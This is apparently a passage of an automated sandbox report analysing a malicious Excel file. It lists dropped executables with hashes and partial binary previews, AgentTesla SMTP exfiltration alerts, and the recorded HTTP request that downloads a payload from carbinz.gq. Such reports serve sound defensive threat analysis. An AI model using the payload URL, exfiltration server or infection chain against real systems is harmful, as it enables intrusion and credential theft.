                                            • 185.227.153.177
                                            wed.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            ORDER CONFIRMATION.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            RFQ Plasma cutting machine.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Price List.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Enq 557.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            b98b396b_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            f8198274_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            PO 4302003683.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Tender Overview 10052021.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            ORDER 10.05.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            purchase request.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Payment Swift.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            NEW ORDER LIST.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Company Profile.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            RFQ KR-21-087.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            INQUIRY 71652628.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Payment Note.xlsxGet hashmaliciousBrowse
                                            • 185.239.243.112

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:downloaded
                                            Size (bytes):758272
                                            Entropy (8bit):7.295996200857929
                                            Encrypted:false
                                            SSDEEP:12288:QoLLoS60/K7yh0AGWPlPjC6EPOyZoTRXq0R193e4hyOVj4:QoLAPWtP7uDK5R1p8Oq
                                            MD5:0B4CC13DE8C54ADD5149B56649B3F680
                                            SHA1:4FB70EDD4A74EA99D93225D8FC2901F699F1140F
                                            SHA-256:579D75FB8F8F893D2E1AE2845FC40E21EAB07AA6601B235E8C77F6E52956EF1A
                                            SHA-512:37A087FA83253AEE38EA440961A402F178EEB1209076E635B12DC829AAED691F81FFA637D148864AD8DACAD9BA66319A8605E71BBABC952F514F654B7FDE99C5
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 49%
                                            Reputation:low
                                            IE Cache URL:http://carbinz.gq/modex/joewealthx.exe
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5L...............0................. ........@.. ....................................@.....................................O...................................l................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...~......v....................................................0...........r...p.+..*..0...........r...p.+..*".(.....*.0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..2..........($.....(%........,...("......(&....('...(.....*>...(#...(.....*...0................b`.+..*...("... .......( ...h..(!...h(....(Q...&*..0..........
                                            C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Process:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):758272
                                            Entropy (8bit):7.295996200857929
                                            Encrypted:false
                                            SSDEEP:12288:QoLLoS60/K7yh0AGWPlPjC6EPOyZoTRXq0R193e4hyOVj4:QoLAPWtP7uDK5R1p8Oq
                                            MD5:0B4CC13DE8C54ADD5149B56649B3F680
                                            SHA1:4FB70EDD4A74EA99D93225D8FC2901F699F1140F
                                            SHA-256:579D75FB8F8F893D2E1AE2845FC40E21EAB07AA6601B235E8C77F6E52956EF1A
                                            SHA-512:37A087FA83253AEE38EA440961A402F178EEB1209076E635B12DC829AAED691F81FFA637D148864AD8DACAD9BA66319A8605E71BBABC952F514F654B7FDE99C5
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 49%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5L...............0................. ........@.. ....................................@.....................................O...................................l................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...~......v....................................................0...........r...p.+..*..0...........r...p.+..*".(.....*.0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..2..........($.....(%........,...("......(&....('...(.....*>...(#...(.....*...0................b`.+..*...("... .......( ...h..(!...h(....(Q...&*..0..........
                                            C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):758272
                                            Entropy (8bit):7.295996200857929
                                            Encrypted:false
                                            SSDEEP:12288:QoLLoS60/K7yh0AGWPlPjC6EPOyZoTRXq0R193e4hyOVj4:QoLAPWtP7uDK5R1p8Oq
                                            MD5:0B4CC13DE8C54ADD5149B56649B3F680
                                            SHA1:4FB70EDD4A74EA99D93225D8FC2901F699F1140F
                                            SHA-256:579D75FB8F8F893D2E1AE2845FC40E21EAB07AA6601B235E8C77F6E52956EF1A
                                            SHA-512:37A087FA83253AEE38EA440961A402F178EEB1209076E635B12DC829AAED691F81FFA637D148864AD8DACAD9BA66319A8605E71BBABC952F514F654B7FDE99C5
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 49%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5L...............0................. ........@.. ....................................@.....................................O...................................l................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...~......v....................................................0...........r...p.+..*..0...........r...p.+..*".(.....*.0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..2..........($.....(%........,...("......(&....('...(.....*>...(#...(.....*...0................b`.+..*...("... .......( ...h..(!...h(....(Q...&*..0..........
                                            C:\Users\user\Desktop\~$99feb78a_by_Libranalysis.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):165
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                            Static File Info

                                            General

                                            File type:Microsoft Excel 2007+
                                            Entropy (8bit):7.997938558476036
                                            TrID:
                                            • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                            • ZIP compressed archive (8000/1) 16.67%
                                            File name:99feb78a_by_Libranalysis.xlsx
                                            File size:658060
                                            MD5:99feb78ab55c66b871d8998b20528b61
                                            SHA1:1c96f08e92401f2396ad0b074ca55049a773e4e0
                                            SHA256:5f4e4fbde7ed003dc34954ee301977f697de1cd2d52beafd898023797ab47255
                                            SHA512:29bf77dd8938db2372289af6ebcd41718cccbd2c243f17883e57a8cc14a6211ded0d5658e81f79812d97c74c934255ee83eaef88bdb9d15d9fe24d2cb36d069e
                                            SSDEEP:12288:ZS0xXaNcg+zPU79FzdbzdSy/3mKEQZMFcIp0k6Po/6ziiDYIOCnF4V19hbVW+FqC:fXukjU7dvdZtZUUPLmiHfKhhW+FqC
                                            File Content Preview:PK........HI.R.c..............[Content_Types].xmlUT......`...`...`.U_O.0.......uj.v......mo........c[.....s:`C.Q....J......f....kHh...........e%.\.....Iy.\.P.-.8...4..F...=V.!...D.@....<.,Bj..kZ...J-AN..oR.O.iD.C.g..P.......SR[/...s...*Fg."..ko....ba5..o[

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OpenXML
                                            Number of OLE Files:1

                                            OLE File "/opt/package/joesandbox/database/analysis/412910/sample/99feb78a_by_Libranalysis.xlsx"

                                            Indicators

                                            Has Summary Info:False
                                            Application Name:unknown
                                            Encrypted Document:False
                                            Contains Word Document Stream:
                                            Contains Workbook/Book Stream:
                                            Contains PowerPoint Document Stream:
                                            Contains Visio Document Stream:
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:False

                                            Summary

                                            Author:Modexcomm
                                            Last Saved By:Modexcomm
                                            Create Time:2019-11-27T09:20:57Z
                                            Last Saved Time:2019-11-27T09:22:47Z
                                            Creating Application:Microsoft Excel
                                            Security:0

                                            Document Summary

                                            Thumbnail Scaling Desired:false
                                            Contains Dirty Links:false
                                            Shared Document:false
                                            Changed Hyperlinks:false
                                            Application Version:12.0000

                                            Streams

                                            Stream Path: \x1ole10nativE, File Type: data, Stream Size: 957277
                                            General
                                            Stream Path:\x1ole10nativE
                                            File Type:data
                                            Stream Size:957277
                                            Entropy:5.83349320552
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . f . . . . . . . p . . . . . . . . . . . . . . . . . . . 7 . . . . > S . . . . . . . - " . . . . . . . . @ . . ] . * . ; - . . . . s K . . . C . . . . . . . s . . . . D 5 . . . " . 4 . . . , x . . ' . h . R . . ; . . . . J . . . . . . - . 0 . . . , . @ . . 7 2 Z . . a . ^ ; 4 7 . x . m * W . E T . 8 N F . d . z . c . + . . . ' . . . 3 . Y . . . . . . j . . . s . . ! . . : w . . . . . . . . . ` V N . . . . . . . f N ) . . . T . < . ` x . . . 9 & . . z . H . . . . . \\ . . l . . . . . q . . . .
                                            Data Raw:d4 8d d2 03 02 03 a2 0b 66 a5 01 08 d7 0c bb ab 70 d3 d3 81 f3 97 cd 96 d3 8b 0b 8b 19 be e7 0b f7 f2 81 ee 37 a4 b0 f2 8b 3e 53 ff d7 05 d1 d0 ac b7 2d 22 d0 ac b7 ff e0 d5 89 9f 40 00 de 5d 81 2a f3 3b 2d a2 19 b6 8e 73 4b 10 bc d8 43 0c 86 8d b8 a1 99 ed 73 b5 a3 dd 02 44 35 b9 d0 e2 22 a3 34 8d e3 d8 2c 78 a4 f1 27 09 68 ae 52 11 88 3b ca fe f3 85 4a 0f ee 02 aa c7 c6 2d be 30
                                            Stream Path: 4GlTJmcon8VdDTzzzrv8wAmWEC, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:4GlTJmcon8VdDTzzzrv8wAmWEC
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/13/21-03:23:11.176471TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49169587192.168.2.22162.241.85.66
                                            05/13/21-03:23:19.583159TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49170587192.168.2.22162.241.85.66
                                            05/13/21-03:23:29.539826TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49171587192.168.2.22162.241.85.66
                                            05/13/21-03:23:35.576991TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49172587192.168.2.22162.241.85.66
                                            05/13/21-03:23:54.212356TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49174587192.168.2.22162.241.85.66
                                            05/13/21-03:24:05.104636TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49175587192.168.2.22162.241.85.66
                                            05/13/21-03:24:10.242606TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49176587192.168.2.22162.241.85.66

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2021 03:22:25.335659981 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.384277105 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.384367943 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.384917021 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.433598042 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434566975 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434598923 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434622049 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434645891 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434653044 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.434689999 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.434701920 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434725046 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434746981 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.434747934 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434772015 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434779882 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.434793949 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434818029 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.434860945 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.434868097 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.434904099 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.443057060 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483283997 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483320951 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483345985 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483369112 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483391047 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483392000 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483411074 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483417034 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483418941 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483421087 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483443975 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483467102 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483489037 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483490944 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483500004 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483505011 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483511925 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483525038 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483536005 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483560085 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483599901 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483611107 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483617067 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483628035 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483653069 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483674049 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483675957 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483697891 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483699083 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483736992 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483741999 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483743906 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483766079 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483781099 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483789921 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483803988 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483817101 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483824968 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483855009 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.485155106 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533689022 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533725023 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533744097 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533761978 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533787966 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533813953 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533838987 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533862114 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533864975 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533885002 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533902884 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533920050 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533945084 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533946037 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533957958 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533971071 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533976078 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533996105 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533999920 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534008026 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534017086 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534023046 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534035921 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534046888 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534077883 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534089088 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534113884 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534137964 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534161091 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534173965 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534185886 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534199953 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534205914 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534236908 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534245014 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534271002 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534295082 CEST8049167185.239.243.112192.168.2.22

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2021 03:22:25.203634024 CEST5219753192.168.2.228.8.8.8
                                            May 13, 2021 03:22:25.260932922 CEST53521978.8.8.8192.168.2.22
                                            May 13, 2021 03:22:25.261277914 CEST5219753192.168.2.228.8.8.8
                                            May 13, 2021 03:22:25.318331957 CEST53521978.8.8.8192.168.2.22
                                            May 13, 2021 03:23:03.165057898 CEST5309953192.168.2.228.8.8.8
                                            May 13, 2021 03:23:03.353410959 CEST53530998.8.8.8192.168.2.22
                                            May 13, 2021 03:23:09.481934071 CEST5283853192.168.2.228.8.8.8
                                            May 13, 2021 03:23:09.692992926 CEST53528388.8.8.8192.168.2.22
                                            May 13, 2021 03:23:09.696012974 CEST5283853192.168.2.228.8.8.8
                                            May 13, 2021 03:23:09.752847910 CEST53528388.8.8.8192.168.2.22
                                            May 13, 2021 03:23:18.072135925 CEST6120053192.168.2.228.8.8.8
                                            May 13, 2021 03:23:18.129133940 CEST53612008.8.8.8192.168.2.22
                                            May 13, 2021 03:23:27.948478937 CEST4954853192.168.2.228.8.8.8
                                            May 13, 2021 03:23:28.011239052 CEST53495488.8.8.8192.168.2.22
                                            May 13, 2021 03:23:28.012181044 CEST4954853192.168.2.228.8.8.8
                                            May 13, 2021 03:23:28.063622952 CEST53495488.8.8.8192.168.2.22
                                            May 13, 2021 03:23:34.145766973 CEST5562753192.168.2.228.8.8.8
                                            May 13, 2021 03:23:34.205548048 CEST53556278.8.8.8192.168.2.22
                                            May 13, 2021 03:23:34.206605911 CEST5562753192.168.2.228.8.8.8
                                            May 13, 2021 03:23:34.266680002 CEST53556278.8.8.8192.168.2.22
                                            May 13, 2021 03:23:45.845840931 CEST5600953192.168.2.228.8.8.8
                                            May 13, 2021 03:23:45.905827999 CEST53560098.8.8.8192.168.2.22
                                            May 13, 2021 03:23:52.810729980 CEST6186553192.168.2.228.8.8.8
                                            May 13, 2021 03:23:52.868915081 CEST53618658.8.8.8192.168.2.22
                                            May 13, 2021 03:23:52.869513988 CEST6186553192.168.2.228.8.8.8
                                            May 13, 2021 03:23:52.926522970 CEST53618658.8.8.8192.168.2.22
                                            May 13, 2021 03:24:01.436736107 CEST5517153192.168.2.228.8.8.8
                                            May 13, 2021 03:24:01.494138002 CEST53551718.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 13, 2021 03:22:25.203634024 CEST192.168.2.228.8.8.80xfc39Standard query (0)carbinz.gqA (IP address)IN (0x0001)
                                            May 13, 2021 03:22:25.261277914 CEST192.168.2.228.8.8.80xfc39Standard query (0)carbinz.gqA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:03.165057898 CEST192.168.2.228.8.8.80xd9fbStandard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:09.481934071 CEST192.168.2.228.8.8.80xd926Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:09.696012974 CEST192.168.2.228.8.8.80xd926Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:18.072135925 CEST192.168.2.228.8.8.80x22bfStandard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:27.948478937 CEST192.168.2.228.8.8.80xca54Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:28.012181044 CEST192.168.2.228.8.8.80xca54Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:34.145766973 CEST192.168.2.228.8.8.80xf276Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:34.206605911 CEST192.168.2.228.8.8.80xf276Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:45.845840931 CEST192.168.2.228.8.8.80x7d69Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:52.810729980 CEST192.168.2.228.8.8.80xe625Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:23:52.869513988 CEST192.168.2.228.8.8.80xe625Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)
                                            May 13, 2021 03:24:01.436736107 CEST192.168.2.228.8.8.80x7296Standard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 13, 2021 03:22:25.260932922 CEST8.8.8.8192.168.2.220xfc39No error (0)carbinz.gq185.239.243.112A (IP address)IN (0x0001)
                                            May 13, 2021 03:22:25.318331957 CEST8.8.8.8192.168.2.220xfc39No error (0)carbinz.gq185.239.243.112A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:03.353410959 CEST8.8.8.8192.168.2.220xd9fbNo error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:09.692992926 CEST8.8.8.8192.168.2.220xd926No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:09.752847910 CEST8.8.8.8192.168.2.220xd926No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:18.129133940 CEST8.8.8.8192.168.2.220x22bfNo error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:28.011239052 CEST8.8.8.8192.168.2.220xca54No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:28.063622952 CEST8.8.8.8192.168.2.220xca54No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:34.205548048 CEST8.8.8.8192.168.2.220xf276No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:34.266680002 CEST8.8.8.8192.168.2.220xf276No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:45.905827999 CEST8.8.8.8192.168.2.220x7d69No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:52.868915081 CEST8.8.8.8192.168.2.220xe625No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:23:52.926522970 CEST8.8.8.8192.168.2.220xe625No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)
                                            May 13, 2021 03:24:01.494138002 CEST8.8.8.8192.168.2.220x7296No error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • carbinz.gq

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249167185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            TimestampkBytes transferredDirectionData
                                            May 13, 2021 03:22:25.384917021 CEST0OUTGET /modex/joewealthx.exe HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: carbinz.gq
                                            Connection: Keep-Alive
                                            May 13, 2021 03:22:25.434566975 CEST2INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Thu, 13 May 2021 01:22:25 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 758272
                                            Last-Modified: Wed, 12 May 2021 08:04:19 GMT
                                            Connection: keep-alive
                                            ETag: "609b8c03-b9200"
                                            Accept-Ranges: bytes
